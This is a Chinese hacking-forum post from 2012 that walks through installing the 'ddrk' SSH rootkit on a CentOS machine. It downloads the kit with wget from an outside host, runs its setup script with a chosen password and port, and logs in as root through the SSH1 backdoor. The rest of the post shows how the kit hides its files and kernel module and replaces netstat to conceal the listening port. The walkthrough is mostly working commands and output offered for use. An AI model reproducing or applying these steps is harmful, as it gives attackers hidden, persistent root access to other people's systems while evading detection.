切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
373 替换型后门 ddrk Ssh v1[复制链接]
发表于 2012-12-10 19:03:53 | 显示全部楼层 |!read_mode!
这个和mafix 久是一样的 修改版本 只是他替换了NETSTAT 系统文件 达到端口隐藏的效果
还游他内涵了adore-ng的隐藏文件功能 在tty里面 达到文件隐藏的效果
也是个2B后门 谨慎使用 先备份虚拟机 但是比mafix好太多了




  1. [root@Centos tmp]# wget http://lucky.fuzzexp.org/file/r00tk1t/ddrk.zip
  2. [root@Centos tmp]# unzip ddrk.zip
  3. Archive:  ddrk.zip
  4.    creating: ddrk/
  5.   inflating: ddrk/bin.tgz            
  6.   inflating: ddrk/netstat            
  7.   inflating: ddrk/rk.ko              
  8.   inflating: ddrk/setup              
  9.   inflating: ddrk/tty               
  10. [root@Centos tmp]# cd ddrk
  11. [root@Centos ddrk]#
复制代码


安装方法一样


  1. [root@Centos ddrk]# chmod -R 777 *
复制代码


安装:


  1. [root@Centos ddrk]# ./setup helen 10086

  2. gzip: stdin: unexpected end of file
  3. tar: Child returned status 1
  4. tar: 由于前面延迟的错误而退出
  5. Using Password : helen
  6. Using ssh-port : 10086
  7. Chain INPUT (policy ACCEPT)
  8. target     prot opt source               destination         
  9. RH-Firewall-1-INPUT  all  --  anywhere             anywhere            
  10. [root@Centos ddrk]# nc -vv 127.0.0.1 10086
  11. Connection to 127.0.0.1 10086 port [tcp/*] succeeded!
  12. SSH-1.5-2.0.13

  13. [root@Centos ddrk]#
复制代码


链接方法和mafix一样 记得先开放防火墙


  1. brk<~> $ ssh root@5.5.5.6 -p10086 -1
  2. root@5.5.5.6's password:
  3. Last login: Mon Nov 26 14:45:43 2012 from 5.5.5.1

  4. [sh]  w.e.l.c.o.m.e
  5. [sh]  To The DoDo's Rootkit

  6. [root@DoDo:/root]# id
  7. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
  8. [root@DoDo:/root]#
复制代码


链接

看隐藏 服务目录


  1. [root@Centos ddrk]# ls /lib/libsh.so
  2. bash  shdcf  shhk  shhk.pub  shrs
  3. [root@Centos ddrk]# ls /lib/ | grep libsh
复制代码

主目录


  1. [root@Centos ddrk]# ls /usr/lib/libsh
  2. tty
  3. [root@Centos ddrk]# ls /usr/lib/ | grep libsh
  4. [root@Centos ddrk]#
复制代码

隐藏得不错看端口

  1. [root@Centos ddrk]# netstat -antp
  2. Active Internet connections (servers and established)
  3. Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
  4. -                   tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1782/portmap        
  5. tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2091/cupsd         
  6. tcp        0      0 0.0.0.0:728                 0.0.0.0:*                   LISTEN      1818/rpc.statd      
  7. tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2130/sendmail: acce
  8. [root@Centos ddrk]#
复制代码

netstat 被替换了看模块
  1. [root@Centos tmp]# lsmod | grep rk
  2. [root@Centos tmp]#
复制代码

隐藏了



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 07:30

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部